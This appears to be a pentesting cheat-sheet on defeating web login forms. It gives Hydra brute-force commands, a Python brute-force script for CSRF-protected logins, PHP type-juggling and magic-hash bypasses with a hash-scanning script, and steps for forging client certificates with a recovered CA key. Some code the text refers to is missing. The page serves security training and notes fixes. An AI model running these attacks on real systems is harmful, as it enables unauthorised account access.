Login Panes

During a pentest we often run into login panes that we want to bypass or brute-force. This page collects the most common tricks for both.

Bruteforce it!

Hydra

Hydra is a fast network login cracker that supports a wide range of authentication protocols, including SSH and HTTP (forms and Basic auth).

POST Forms

hydra <ip-addr> -l user -P passwords.txt -s <port> -vV -f http-form-post "/index.php:user=^USER^&password=^PASS^:Invalid Credentials"

The module argument has three colon-separated fields: the path, the POST body with ^USER^ and ^PASS^ as placeholders, and the string that identifies a failed login (prefix it with S= to match a success string instead, e.g. S=Welcome). -f stops at the first valid pair and -vV prints every attempt.

-l <user>      single username
-L <file>      username wordlist
-p <password>  single password
-P <file>      password wordlist

Basic Auth

hydra <ip-addr> -l user -P passwords.txt -s <port> -vV -f http-get /index.php

Here the http-get module sends each pair in an Authorization: Basic header against /index.php; add -S if the target speaks HTTPS.

My own script

I made my own script in order to bruteforce some login panes with CSRF protection. I think it is a good alternative to the Burp Suite Pitchfork attack.

#!/usr/bin/env python3

import re
import sys
import requests
import urllib3

# The target uses a self-signed certificate; silence the verify=False warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

s = requests.Session()
username = "admin"

# Get CSRF token (the session cookie it is bound to is kept in s)
resp = s.get("https://WEBPAGE.LOCAL/", verify=False)
regex = '<input type="hidden" name="csrf" value="(.*?)"'
token = re.search(regex, resp.text).group(1)

with open("/usr/share/wordlists/rockyou.txt", "r", encoding="utf-8", errors="ignore") as wordlist:
    for pwd in wordlist.read().splitlines():

        # Bruteforce: one POST per candidate, reusing the token fetched above.
        # If the application issues a fresh token on every response, move the
        # GET + re.search into this loop.
        data_post = {
            "csrf": token,
            "username": username,
            "password": pwd,
        }
        print("[!] Trying: " + pwd)
        # This target expects a JSON body; use data=data_post for a
        # classic form-encoded POST
        resp2 = s.post("https://WEBPAGE.LOCAL/login", json=data_post, verify=False)
        if "permission_denied" not in resp2.text:
            print("Username = " + username + " Password = " + pwd)
            sys.exit(0)

Bypass it!

There are many different ways to bypass a login pane; these are the most common ones.

SQLi

More information on bypassing login panes with SQL injection can be found in:

SQL Injection

PHP Type Juggling (==)

PHP's type comparison rules can lead to vulnerabilities, in this case a login bypass. Loose comparisons (==) apply a set of operand conversion rules ("type juggling") that were meant to make life easier for developers.

Let's check the differences between strict comparisons (===) and loose comparisons (==): === only returns true when both type and value match, while == converts the operands first, so for example "1e3" == "1000" is true.

PHP strict comparison table
PHP loose comparison table

When we find code like this:

Instead of sending a string we send an array (for example password[]=x instead of password=x), and the comparison no longer behaves as the developer intended, so we bypass the login:

Magic Hashes

This has a particular implication for password hashes when the equals-equals (==) operator is used. In a loose comparison a string of the form 0e followed only by digits is a numeric string in scientific notation, so the whole string is converted to the float 0. Inputs whose hash matches ^0+e\d*$ are therefore all "equal" to zero, and to each other, under ==. That means that when the stored password hash starts with "0e" and every following character is a digit from 0-9, any other input whose hash has the same shape is accepted as a match, regardless of the actual digits. The fix is to compare hashes with === or with hash_equals().
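As an added example (not code from the original page), the following script scans a wordlist for "magic hash" inputs, i.e. words whose MD5 or SHA-1 hex digest matches ^0+e[0-9]+$ and is therefore loosely equal to 0, and to every other such hash, in PHP. The inline wordlist is constructed for the example and mixes ordinary passwords with the two well-known magic inputs 240610708 (MD5) and 10932435112 (SHA-1). The same loop works against any real wordlist piped into scan_wordlist.

```shell
#!/usr/bin/env bash
# Added example: find inputs whose hash collides with "0" under PHP's == .
# The wordlist below is constructed; 240610708 (MD5) and 10932435112 (SHA-1)
# are the known magic values, the rest are ordinary passwords.
set -eu

# Print the hex digest of $1 with the algorithm named in $2 (md5 or sha1).
digest() {
    printf '%s' "$1" | "${2}sum" | cut -d' ' -f1
}

# Return 0 when the digest is a PHP magic hash: one or more zeros, an "e",
# then only digits, which a loose comparison converts to the float 0.0.
is_magic() {
    printf '%s\n' "$1" | grep -Eq '^0+e[0-9]+$'
}

# Read words from stdin and print "algo word digest" for every magic hash.
scan_wordlist() {
    local algo="$1" word h
    while IFS= read -r word; do
        h=$(digest "$word" "$algo")
        if is_magic "$h"; then
            printf '%s %s %s\n' "$algo" "$word" "$h"
        fi
    done
}

# Constructed sample wordlist: a few normal passwords plus the magic inputs.
sample_wordlist() {
    printf '%s\n' password admin 240610708 QNKCDZO letmein 10932435112
}

# Number of magic hashes found in the sample wordlist for one algorithm.
count_magic() {
    sample_wordlist | scan_wordlist "$1" | wc -l | tr -d ' '
}

scan_wordlist md5 < /dev/stdin 2>/dev/null || true
```

If the application stores md5($password) and compares it with ==, any word that scan_wordlist reports is accepted for every account whose stored hash is also of the 0e... form. Note that PHP 8 kept numeric-string vs numeric-string comparisons unchanged, so this still applies there.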

Client Certificates

SSL/TLS certificates are commonly used both for encryption and for identifying the parties. Sometimes a client certificate is required instead of (or in addition to) credentials at login, so whoever holds a certificate the server trusts gets in.

Setting up the private key and the certificate (Server)

First of all, we need to generate our keys and certificates with the openssl command-line tool.

Setting up client certificates

To create a key and a Certificate Signing Request for Alice and Bob we can use the following command:

Server Signed Certificate:

During the pentest we may find the private key used to sign client certificates; remember that the server certificate itself can be downloaded with the browser, so with both we can sign our own client certificate.

Self-Signed Certificate:

Trying to get in

To use these certificates in the browser we need to bundle the key and certificate in PKCS#12 format; curl accepts the PKCS#12 file too (--cert-type P12) or the PEM key and certificate directly.

Via Browser

Settings -> Privacy & Security -> Security -> Certificates -> View Certificates... -> Your Certificates -> Import

Via Curl
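The whole procedure above (server CA, client key and CSR, server-signed and self-signed client certificates, PKCS#12 bundle, curl) as one added example that is not the original page's own command listing. The user name alice, the host WEBPAGE.LOCAL and the PKCS#12 password changeit are assumptions; the server is assumed to trust certificates issued by ca.crt.

```shell
#!/usr/bin/env bash
# Added example: build a CA ("server" key/cert), a client key + CSR, sign
# the CSR with the CA key, and bundle key + cert as PKCS#12 for the browser
# or curl. alice, WEBPAGE.LOCAL and the password are assumed values.
set -eu

# Server side: a self-signed CA certificate that the server trusts.
make_ca() {
    openssl req -x509 -newkey rsa:2048 -nodes -days 365 \
        -subj "/CN=WEBPAGE.LOCAL CA" \
        -keyout ca.key -out ca.crt 2>/dev/null
}

# Client side: private key and a Certificate Signing Request for one user.
make_client_csr() {
    local user="$1"
    openssl req -newkey rsa:2048 -nodes \
        -subj "/CN=${user}" \
        -keyout "${user}.key" -out "${user}.csr" 2>/dev/null
}

# Server-signed certificate: only possible when we hold the CA key,
# e.g. one recovered during the pentest.
sign_with_ca() {
    local user="$1"
    openssl x509 -req -days 365 -CA ca.crt -CAkey ca.key -CAcreateserial \
        -in "${user}.csr" -out "${user}.crt" 2>/dev/null
}

# Self-signed client certificate: a server that validates the chain rejects
# it, so it only tells us whether validation is missing.
self_sign() {
    local user="$1"
    openssl x509 -req -days 365 -signkey "${user}.key" \
        -in "${user}.csr" -out "${user}-selfsigned.crt" 2>/dev/null
}

# Bundle key + certificate into PKCS#12 for the browser import dialog.
make_p12() {
    local user="$1" pass="$2"
    openssl pkcs12 -export -inkey "${user}.key" -in "${user}.crt" \
        -passout "pass:${pass}" -out "${user}.p12"
}

# Does the certificate chain back to our CA? exit 0 = yes.
verify_cert() {
    openssl verify -CAfile ca.crt "$1" >/dev/null 2>&1
}

# Present the PKCS#12 bundle to the login page with curl (-k because the
# server's own certificate is self-signed in this setup).
login_with_cert() {
    local user="$1" pass="$2" url="$3"
    curl -sk --cert "${user}.p12:${pass}" --cert-type P12 "$url"
}

# Run every step for one user.
build_all() {
    local user="$1" pass="$2"
    make_ca
    make_client_csr "$user"
    sign_with_ca "$user"
    self_sign "$user"
    make_p12 "$user" "$pass"
}
```

Usage: build_all alice changeit, then login_with_cert alice changeit https://WEBPAGE.LOCAL/login; import alice.p12 through the Firefox dialog above when testing from the browser. verify_cert alice.crt succeeds while verify_cert alice-selfsigned.crt fails, which is exactly the check a correctly configured server performs.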
